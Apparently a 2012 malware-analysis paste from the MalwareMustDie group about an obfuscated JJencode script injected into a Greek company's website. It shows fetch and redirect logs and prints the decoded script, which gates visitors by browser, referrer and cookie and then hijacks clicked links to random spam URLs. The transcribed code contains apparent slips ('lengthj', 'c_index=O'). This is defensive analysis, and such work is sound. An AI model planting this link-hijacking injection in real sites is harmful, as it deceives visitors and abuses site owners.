
(Updated)The suspected JS/Agent/Downloader Trojan #MMD

  1. ===============================================
  2. The suspected JS/Agent/Downloader Trojan
  3. #MalwareMustDie | @unixfreaxjp | Sat Oct 27 02:06:28 JST 2012
  4. Update: Sat Oct 27 14:19:55 JST 2012 (Decoded JJencode)
  5. ===============================================
  6.  
  7. // checking a hint...
  8.  
  9. $ myfetch h00p://www.iliosak.gr/index.php
  10. --proxy=1
  11. --user-agent="Mozila/4.3(X11; U; MacOSX)"
  12. --referer="h00p://www.google.com/search?q=gmail"
  13. --target="h00p://www.iliosak.gr/index.php"
  14.  
  15. --01:17:44-- h00p://www.iliosak.gr/index.php
  16. => `index.php'
  17. Connecting to 192.168.7.11:8118... connected.
  18. Proxy request sent, awaiting response... 200 OK
  19. Length: unspecified [text/html]
  20. 01:17:48 (19.24 KB/s) - `index.php' saved [51627]
  21.  
  22. // peek inside...
  23.  
  24. $ head index.php
  25.  
  26. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "h00p://www.w3.or
  27. g/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  28.  
  29. <html xmlns="h00p://www.w3.org/1999/xhtml" xml:lang="el-gr" lang="el-gr"
  30. dir="ltr" >
  31.  
  32. <head>
  33. <SCRIPT type="text/javascript"> <!--
  34. $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$
  35. :({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$
  36. :++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=
  37. $+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$.
  38. _$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])
  39. +$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_ :
  40.  
  41. // ↑ nice! :-)
  42. // 1. he tried to hide the script tag...
  43. // 2. JJencode, which is too obviously suspicious to ignore..
  44. // 3. what is the purpose behind this?
  45.  
  46.  
  47. // A greek language site...ok.
  48.  
  49. <meta name="keywords" content="Ηλιακοί
  50. θερμοσίφωνες,ηλιακός θερμοσίφωνας,Ηλιακά συστήματα,ηλιακοί,φωτοβολταϊκά,κλιματισμός,θέρμανση,Μεσσηνία" />
  51. <meta name="description" content="Εργοστάσιο κατασκευής ηλιακών συστημάτων και εφαρμογών φωτοβολταϊκών θέρμανσης &amp; κλιματισμού στη Μεσσηνία από το 1977.
  52.  
  53. //Obfuscated JavaScript is under analysis....
  54.  
  55.  
  56. // OTHERS are....
  57.  
  58. //requesting
  59.  
  60. h00p://www.iliosak.gr/templates/yoo_switch/lib/js/mootools.js.php .......CLEAN
  61. h00p://www.iliosak.gr/media/system/js/caption.js .......CLEAN
  62. h00p://www.iliosak.gr/templates/yoo_switch/lib/js/template.js.php .......CLEAN
  63. h00p://www.iliosak.gr/modules/mod_virtuemart/vm_transmenu/transmenu.js .......CLEAN
  64.  
  65.  
  66. // redirecting..
  67.  
  68. h00p://crotopole.eu/a41bb3d1c7 ⇒ h00p://www.cam4cam.fr/
  69. --01:40:46-- h00p://crotopole.eu/a41bb3d1c7
  70. => `a41bb3d1c7'
  71. Resolving crotopole.eu... 88.191.151.166
  72. Connecting to crotopole.eu|88.191.151.166|:80... connected.
  73. h00p request sent, awaiting response... 301 Moved Permanently
  74. Location: h00p://www.cam4cam.fr/ [following]
  75. --01:40:46-- h00p://www.cam4cam.fr/
  76. => `index.html'
  77. Resolving www.cam4cam.fr... 88.191.151.166
  78. Reusing existing connection to crotopole.eu:80.
  79. h00p request sent, awaiting response... 200 OK
  80. Length: 5,961 (5.8K) [text/html]
  81.  
  82. // a wordpress↓ ............CLEAN one.....
  83.  
  84. #Penguinzophren, Sentimancho | Cam4 cam | Chatroulette & Chat webcam
  85. #Penguinzophren Vs Sentimancho RSS Feed
  86.  
  87. Penguinzophren Vs Sentimancho
  88. * Penguinzophren Vs Sentimancho
  89. *
  90. * Non classé
  91.  
  92. Matt Cutts Vs Black Hat
  93.  
  94. Sentimancho Vs Penguinzophren
  95. Non classé | riko | Comments (0) |
  96. Le but du concours est de : Niker MC et GG (pour les intimes) Tu l'auras compris mon titre veut tout dire, Matt cutts
  97. je veux ta peau! Celle du Penguinzophren ainsi que celle du Sentimancho . Matt Cutts le pingouin en slip Penguinzophren
  98. et Sentimancho pour moi et tous les referenceurs qui participent de près où de lien à cette grande cage aux folles
  99.  
  100.  
  101. // and a download....
  102.  
  103. h00p://www.cres.gr/energy-saving/SCRIPT_2.htm...... clean!...
  104.  
  105. // It is up to the javascript decoding result...
  106. // Handover to the two geniuses in our crack team. Thanks guys!
  107. //The JJEncode turns out to be ↓, which checks your referer, sets/checks the cookie, and checks the browser version for access (a significant check for Chrome..); it is a sort of ACL for visitors accessing the page..
  108.  
  109. ((function $anonymous$(){return" page_links = [];
  110. function setGlobalOnLoad(f) { // registers f to run on page load: DOM2 addEventListener first, then IE attachEvent, else chains onto window.onload
  111. var root = window.addEventListener || window.attachEvent ? window : document.addEventListener ? document : null // `||` binds tighter than `?:`: window if it has either API, else document if it has addEventListener, else null
  112. if (root){
  113. if(root.addEventListener) root.addEventListener(\"load\", f, false)
  114. else if(root.attachEvent) root.attachEvent(\"onload\", f)
  115. } else {
  116. if(typeof window.onload == 'function') {
  117. var existing = window.onload // keeps the page's own onload so the injected handler runs after it instead of replacing it
  118. window.onload = function() {
  119. existing()
  120. f()
  121. }
  122. } else {
  123. window.onload = f
  124. }
  125. }
  126. }
  127. function addHandler(object, event, handler) { // attaches handler for `event` on object via addEventListener, or IE attachEvent('on' + event); does nothing (silently) when neither API exists
  128. if (typeof object.addEventListener != 'undefined')
  129. object.addEventListener(event, handler, false);
  130. else if (typeof object.attachEvent != 'undefined')
  131. object.attachEvent('on' + event, handler);
  132. }
  133.  
  134. if (window.navigator.userAgent.match(/gtb/i) || window.navigator.userAgent.match(/chrome/i) || document.referrer!='' || document.referrer.indexOf (document.domain)==-1) { // visitor gate: UA mentions gtb or chrome, or the referrer is non-empty, or the referrer lacks this domain; an empty referrer fails the third test but passes the fourth, so (unless document.domain is empty) one of the two referrer clauses is always true
  135. var right_browser='yes';
  136. }else var right_browser='no'; // `var` is function-scoped, so right_browser is readable after this if/else on either path
  137.  
  138. function getCookie(c_name) // returns the value stored under cookie name c_name, or "" when it is not found
  139. {
  140. if (document.cookie.lengthj) // NOTE(review): `lengthj` is not a String property, so as transcribed this test is always false and the function always returns ""; possibly a decoding slip for `length` — confirm against the raw sample
  141. {
  142. c_start=document.cookie.indexOf(c_name + \"=\"); // c_start and c_end are assigned without var, i.e. implicit globals
  143. if (c_start!=-1)
  144. {
  145. c_start=c_start + c_name.length+1; // skip past "name="
  146. c_end=document.cookie.indexOf(\";\",c_start);
  147. if (c_end==-1) c_end=document.cookie.length; // the last cookie in the string has no trailing ';'
  148. return unescape(document.cookie.substring(c_start,c_end));
  149. }
  150. }
  151. return \"\";
  152. }
  153. var c_index = Math.floor(Math.random() * 5); // random integer 0..4, consumed by the gating condition that follows
  154. var fcoo=getCookie('c_first'); // previous value of the c_first cookie ("" when absent), read before it is overwritten below
  155. var exdate=new Date();
  156. exdate.setDate(exdate.getDate()+365); // one year ahead
  157. document.cookie='c_first'+ \"=\" +escape('false')+\";expires=\"+exdate.toUTCString(); // marks the visitor with c_first=false for a year; the condition that follows compares fcoo (the pre-write value), so a repeat visitor reads as already marked
  158. if (c_index=O && fcoo!='false' && right_browser=='yes') {
  159. setGlobalOnLoad(function() {
  160. var block = document.getElementById('mlk');
  161. var links = block.getElementsByTagName('A');
  162. for (var i = 0; i < links.length; i++) {
  163. page_links.push(links[i].href);
  164. }
  165. var links = document.links;
  166. for (var i = 0; i < links.length; i++) {
  167. addHandler(links[i], \"click\", function(event) {
  168. var index = Math.floor(Math.random() * (page_links.length - 1));
  169. event.target.href = page_links[index];
  170. });
  171. }
  172. });
  173.  
  174.  
  175. #MalwareMustDie!